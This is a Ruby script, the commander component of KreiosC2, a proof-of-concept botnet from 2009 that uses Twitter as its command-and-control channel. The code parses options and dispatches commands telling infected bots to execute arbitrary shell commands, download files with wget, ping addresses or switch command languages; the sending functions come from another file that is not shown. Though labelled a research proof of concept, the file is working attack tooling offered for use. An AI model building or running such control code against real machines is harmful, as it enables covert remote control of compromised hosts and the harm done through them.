#!/usr/bin/env ruby

require "lib/twitter"
require "getoptlong"
require 'digest/md5'
require 'default_command_language'

# == KreiosC2 Command: The commander for a bot written to use Twitter as its C&C
#
# KreiosC2 uses Twitter as its command and control channel. It is a 
# proof of concept only
#
# == Usage
# kreiosc2_command [OPTION]
#	--help, -h: show help
#	--get x, -g x: download (wget) the specified file
#	--ping x, -p x: ping the specified ip address
#	--language x, -l x: use the specified command language file
#	--use-language x, -u x: send change language command to new one
#	--exec x, -e x: execute the specified command.
#			Add an & if you want the command to background otherwise it blocks the bot till finished
#	--status, -s: report on the number of API hits you have remaining
#	-v: verbose
#
# Author:: Robin Wood (dninja@gmail.com)
# Copyright:: Copyright (c) Robin Wood 2009
# Licence:: GPL
#

# The screen name of the user to send commands
SCREEN_NAME="<SCREEN_NAME>"
# And the users password
PASSWORD="<PASSWORD>"

# Show how many API hits you have left and when they will be refreshed
def status()
	results = Twitter::Base.new(SCREEN_NAME, PASSWORD).rate_limit_status()
	puts "API hits: "+results.remaining_hits.to_s+"/"+results.hourly_limit.to_s
	puts "Time of next reset: "+results.reset_time.to_s
end

opts = GetoptLong.new(
	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
	[ '--status', '-s', GetoptLong::NO_ARGUMENT ],
	[ '--ping', "-p" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--language', "-l" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--use-language', "-u" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--get', "-g" , GetoptLong::REQUIRED_ARGUMENT ],
	[ '--exec', "-e" , GetoptLong::REQUIRED_ARGUMENT ],
	[ "-v" , GetoptLong::NO_ARGUMENT ]
)

# Display the usage
def usage
	puts"kreiosc2_command 1.0 Robin Wood (dninja@gmail.com) (www.digininja.org)

Usage: kreiosc2_command [OPTION]
	--help, -h: show help
	--get x, -g x: download (wget) the specified file
	--ping x, -p x: ping the specified ip address
	--language x, -l x: use the specified command language file
	--use-language x, -u x: send change language command to new one
	--exec x, -e x: execute the specified command.
			Add an & if you want the command to background otherwise it blocks the bot till finished
	--status, -s: report on the number of API hits you have remaining
	-v: verbose

"
	exit
end

verbose = false
filename=nil
command=nil
ip_address=nil

begin
	opts.each do |opt, arg|
		case opt
		when '--help'
			usage
		when "--language"
			filename=arg
			if File.exists?(filename)
				require filename
			else
				if verbose
					puts "Language file not found, using default"
				end
			end
		when "--use-language"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			filename=arg
			command="language"
		when "--exec"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			filename=arg
			command="exec"
		when "--get"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			filename=arg
			command="get"
		when "--ping"
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			ip_address=arg
			command="ping"
		when '-v'
			verbose=true
		when '--status'
			if command != nil
				puts "You can only specify one command at a time\n\n"
				usage()
			end
			command="status"
		end
	end
rescue
	usage
end

if command==nil
	usage
end

case command
	when "ping"
		send_ping_command(ip_address, verbose)
	when "language"
		send_new_language_command(filename, verbose)
	when "exec"
		send_exec_command(filename, verbose)
	when "get"
		send_get_command(filename, verbose)
	when "status"
		status()
	when nil
		puts "No command specified"
		usage()
end
